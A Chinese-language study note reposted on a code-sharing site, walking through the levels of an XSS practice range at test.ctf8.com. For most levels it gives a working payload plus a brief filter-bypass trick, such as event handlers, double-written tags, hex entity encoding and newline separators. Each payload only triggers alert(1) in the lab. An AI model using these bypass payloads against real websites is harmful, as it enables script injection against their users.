Web安全測試學習筆記 - XSS靶場 - test.ctf8.com


1.<script>alert(1);</script>

 

2.顯示文字區域過濾了<>,但是input沒有過濾,payload:"><script>alert(1);</script>

 

3.顯示文字區域和input都過濾了<>,payload:'onclick='javascript:alert(1)'

 

4. payload:" onclick='javascript:alert(1)'

 

5.on和script會被加上下划線,payload:"> <a href = javascript:alert(1)>

 

 

6.href,src,data這些關鍵字都加下划線了,payload:" Onclick='javascript:alert(1)'

 

7.雙寫繞過,payload:"> <scrscriptipt>alert(1)</scrscriptipt>

 

8.16進制編碼,payload: &#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3B;

 

 

9.必須要有http://,利用js的注釋符,payload:java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1) // http://

 

10.有個隱藏控件,但是過濾了<>,payload:&t_sort=" type="text" onclick="alert(1)

 

11.跪了,網上找的答案:

12. 和上一題一樣,改User Agent

 

13.同上,用Cookie

 

14、15貌似都有問題,跳過

 

16. script和空格沒法用,payload:keyword=<input%0Atype='text'%0Aonclick='alert(1)'>,或者:<input%0Dtype='text'%0Donclick='alert(1)'>

 

17-20. flash會被禁止,無法彈框

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM